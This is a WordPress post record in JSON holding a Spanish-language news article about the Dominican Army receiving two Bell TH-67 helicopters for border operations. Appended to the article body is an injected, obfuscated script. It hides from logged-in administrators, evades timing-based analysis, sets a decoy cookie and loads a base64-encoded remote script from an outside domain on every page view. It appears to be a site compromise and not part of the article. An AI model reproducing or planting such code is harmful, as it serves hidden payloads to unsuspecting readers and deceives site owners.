{"id":14068,"date":"2023-02-15T08:45:32","date_gmt":"2023-02-15T12:45:32","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14068"},"modified":"2023-02-15T08:45:32","modified_gmt":"2023-02-15T12:45:32","slug":"llegan-al-pais-dos-nuevos-helicopteros-marca-bell-modelo-th-67-para-fortalecer-la-seguridad-de-la-frontera","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14068","title":{"rendered":"Llegan al pa\u00eds dos nuevos helic\u00f3pteros marca Bell modelo TH-67 para fortalecer la seguridad de la frontera"},"content":{"rendered":"<p>Santo Domingo.- El comandante general del Ej\u00e9rcito de la Rep\u00fablica Dominicana (ERD),\u00a0<strong>Carlos Antonio Fern\u00e1ndez Onofre<\/strong>, recibi\u00f3 este martes\u00a0<strong>dos nuevos helic\u00f3pteros marca Bell modelo TH-67,<\/strong>\u00a0como parte del fortalecimiento de las capacidades operativas del componente terrestre de las\u00a0<strong>Fuerzas Armadas en la zona fronteriza<\/strong>.<\/p>\n<p><strong>El anuncio fue realizado en diciembre del 2022 por el Presidente Luis Abinader<\/strong>\u00a0en una visita realizada al Campamento Militar 16 de Agosto, donde tienen su sede la Comandancia General del Ej\u00e9rcito y la Primera Brigada de Infanter\u00eda.<\/p>\n<p>El acto de recibimiento de los dos nuevos helic\u00f3pteros tuvo lugar en el\u00a0<strong>1<sup>.er<\/sup>\u00a0Escuadr\u00f3n de Caballer\u00eda A\u00e9rea del Ej\u00e9rcito Nacional.<\/strong><\/p>\n<p>La adquisici\u00f3n de estas aeronaves permitir\u00e1 reforzar las operaciones que realiza la instituci\u00f3n, como\u00a0<strong>reconocimiento, patrullaje con movilidad a\u00e9rea, maniobras t\u00e1cticas<\/strong>, especialmente en la zona fronteriza donde el terreno, por sus accidentadas condiciones, dificulta el acceso terrestre.<\/p>\n<p>Adem\u00e1s, las mismas podr\u00e1n ser utilizadas por sus caracter\u00edsticas \u00f3ptimas para operaciones de\u00a0<strong>b\u00fasqueda y rescate, evacuaciones m\u00e9dicas, entrenamientos<\/strong>, y otras misiones en las que se requieran elementos de caballer\u00eda a\u00e9rea.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.- El comandante general del Ej\u00e9rcito de la Rep\u00fablica Dominicana (ERD),\u00a0Carlos Antonio Fern\u00e1ndez Onofre, recibi\u00f3 este martes\u00a0dos nuevos helic\u00f3pteros marca Bell modelo TH-67,\u00a0como parte del fortalecimiento de las capacidades operativas del componente terrestre de las\u00a0Fuerzas Armadas en la zona fronteriza. El anuncio fue realizado en diciembre del 2022 por el Presidente Luis Abinader\u00a0en una [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14070,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14068","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14068"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14068\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14070"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}